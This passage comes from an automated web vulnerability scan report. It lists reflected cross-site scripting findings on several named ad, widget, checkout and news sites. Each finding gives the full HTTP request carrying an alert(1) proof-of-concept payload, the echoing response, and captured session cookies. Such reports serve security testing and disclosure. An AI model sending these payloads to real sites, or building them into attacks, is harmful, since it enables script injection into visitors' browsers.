Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP200
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 06 May 02011 18:48:15 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5918
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 09-May-2011 16:46:55 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536156";var cwtagid="101378";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="7285e2be";alert(1)//bd79ae61eda";var ch="90";var cads="0";var cp="536156";var ct="101378";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1]
...[SNIP]...
3.80. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/page_parser.js

Issue detail

The value of the d request parameter is copied into a JavaScript inline comment. The payload c1b45*/alert(1)//4e36c7fd6db was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/scripts/rubicon/page_parser.js?d=www.thevine.com.auc1b45*/alert(1)//4e36c7fd6db HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7856/12590; ses2=12590^2&13549^1; csi2=3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; cd=false

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
Last-Modified: Mon, 09 May 2011 14:07:09 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=3600
Expires: Mon, 09 May 2011 15:07:09 GMT
Date: Mon, 09 May 2011 14:07:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17446


/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */


/*
   The requested resource (/oz/scripts/domains/com.auc1b45*/alert(1)//4e36c7fd6db/page_parser_hooks.js) is not available
*/


function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function(
...[SNIP]...
3.81. http://wd.sharethis.com/api/getCount2.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 633ac<script>alert(1)</script>676868d91db was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getCount2.php?cb=stButtons.processCB633ac<script>alert(1)</script>676868d91db&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 287

stButtons.processCB633ac<script>alert(1)</script>676868d91db({"url":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509%2C0%2C6839926.story","email":9,"total":9,"ourl":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20
...[SNIP]...
3.82. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1d9d<img%20src%3da%20onerror%3dalert(1)>e9e0ca7772 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1d9d<img src=a onerror=alert(1)>e9e0ca7772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.s/b1d9d<img%20src%3da%20onerror%3dalert(1)>e9e0ca7772tory HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 208

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509,0,6839926.s\/b1d9d<img src=a onerror=alert(1)>e9e0ca7772tory"});
3.83. http://wd.sharethis.com/api/getCount2.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload d4b86<img%20src%3da%20onerror%3dalert(1)>9ec8cdb2a15 was submitted in the url parameter. This input was echoed as d4b86<img src=a onerror=alert(1)>9ec8cdb2a15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.storyd4b86<img%20src%3da%20onerror%3dalert(1)>9ec8cdb2a15 HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 207

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509,0,6839926.storyd4b86<img src=a onerror=alert(1)>9ec8cdb2a15"});
3.84. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the evt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d439c"%3balert(1)//cf3d692bcc5 was submitted in the evt parameter. This input was echoed as d439c";alert(1)//cf3d692bcc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel&evt=fireSphereOmInitActiond439c"%3balert(1)//cf3d692bcc5&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web22
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11103
Date: Mon, 09 May 2011 14:00:08 GMT
X-Varnish: 730031054
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();
   if("fireSphereOmInitActiond439c";alert(1)//cf3d692bcc5" != ""){
       evtStr = "fireSphereOmInitActiond439c";alert(1)//cf3d692bcc5();";
       //alert("fire task: fireSphereOmInitActiond439c";alert(1)//cf3d692bcc5 ");
       try{
    eval(evtStr);
       }catch(anErr){

...[SNIP]...
3.85. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the evt request parameter is copied into a JavaScript rest-of-line comment. The payload d308d%0aalert(1)//a380428d17 was submitted in the evt parameter. This input was echoed as d308d
alert(1)//a380428d17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel&evt=fireSphereOmInitActiond308d%0aalert(1)//a380428d17&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web24
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11097
Date: Mon, 09 May 2011 14:00:09 GMT
X-Varnish: 730031142
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();
   if("fireSphereOmInitActiond308d
alert(1)//a380428d17" != ""){
       evtStr = "fireSphereOmInitActiond308d
alert(1)//a380428d17();";
       //alert("fire task: fireSphereOmInitActiond308d
alert(1)//a380428d17 ");
       try{
    eval(evtStr);
       }catch(anErr){
           //alert("Error: "+anErr.message + "Line: "+ ( anErr.number & 0xFFFF));
       }
   }
   
}


/*
// series of omniture methods

*/

// SphereOmniture.protot
...[SNIP]...
3.86. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the siteid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4550"%3balert(1)//1f690486bfe was submitted in the siteid parameter. This input was echoed as b4550";alert(1)//1f690486bfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinelb4550"%3balert(1)//1f690486bfe&evt=fireSphereOmInitAction&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web22
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11750
Date: Mon, 09 May 2011 14:02:24 GMT
X-Varnish: 877141020
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();

...[SNIP]...
ilters="javascript:,surphace.com";
       s_265.trackExternalLinks="true";
       s_265.prop1="";
       s_265.prop2="";
       s_265.prop12="http://www.surphace.com";
       s_265.prop16="siteid : " + "tribune_orlandosentinelb4550";alert(1)//1f690486bfe";
       s_265.prop18="inline";
       s_265.prop19='tribune_orlandosentinelb4550";alert(1)//1f690486bfe_inline';
       s_265.products=';tribune_orlandosentinelb4550";alert(1)//1f690486bfe';
s_265.e
...[SNIP]...
3.87. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the siteid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a86a'%3balert(1)//f26baafc484 was submitted in the siteid parameter. This input was echoed as 2a86a';alert(1)//f26baafc484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel2a86a'%3balert(1)//f26baafc484&evt=fireSphereOmInitAction&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web25
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11747
Date: Mon, 09 May 2011 14:02:24 GMT
X-Varnish: 877141082
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();

...[SNIP]...
.prop2="";
       s_265.prop12="http://www.surphace.com";
       s_265.prop16="siteid : " + "tribune_orlandosentinel2a86a';alert(1)//f26baafc484";
       s_265.prop18="inline";
       s_265.prop19='tribune_orlandosentinel2a86a';alert(1)//f26baafc484_inline';
       s_265.products=';tribune_orlandosentinel2a86a';alert(1)//f26baafc484';
s_265.events='prodview';
s_265.disablepihost=true;
s_265.mmxtitle="www
...[SNIP]...
3.88. https://www.ccnow.com/cgi-local/checkout.cgi [shipto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Issue detail

The value of the shipto request parameter is copied into an HTML comment. The payload 8876a--><script>alert(1)</script>ba066ed09fe940fd1 was submitted in the shipto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-local/checkout.cgi?action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Production&promo=0&returnurl=http%3A%2F%2Fasthmatickitty.com%2F&shipto=8876a--><script>alert(1)</script>ba066ed09fe940fd1&tkey=814744466213 HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:21 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950101; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:08:21 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- shipmod: asmakit 8876a--><script>alert(1)</script>ba066ed09fe940fd1 BC:US -->
...[SNIP]...
3.89. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db195"><a>bdf495dcb29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /newsdb195"><a>bdf495dcb29/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:02:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=caeic5eid9f6nd9t57dlokn7u3; expires=Wed, 01-Jun-2011 17:35:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:02:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-newsdb195"><a>bdf495dcb29-sufjan-stevens-suffered-nervous-breakdown">
...[SNIP]...
3.90. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 772d1"><script>alert(1)</script>e9b4e9393e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/772d1"><script>alert(1)</script>e9b4e9393e8 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=vmgjs1vd6uc2gu9j83ucfc8851; expires=Wed, 01-Jun-2011 17:36:35 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=www.clashmusic.com/news/772d1"><script>alert(1)</script>e9b4e9393e8&amp;send=false&amp;layout=button_count&amp;width=100&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflo
...[SNIP]...
3.91. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903eb"><img%20src%3da%20onerror%3dalert(1)>18c5063c5f6 was submitted in the REST URL parameter 2. This input was echoed as 903eb"><img src=a onerror=alert(1)>18c5063c5f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown903eb"><img%20src%3da%20onerror%3dalert(1)>18c5063c5f6 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
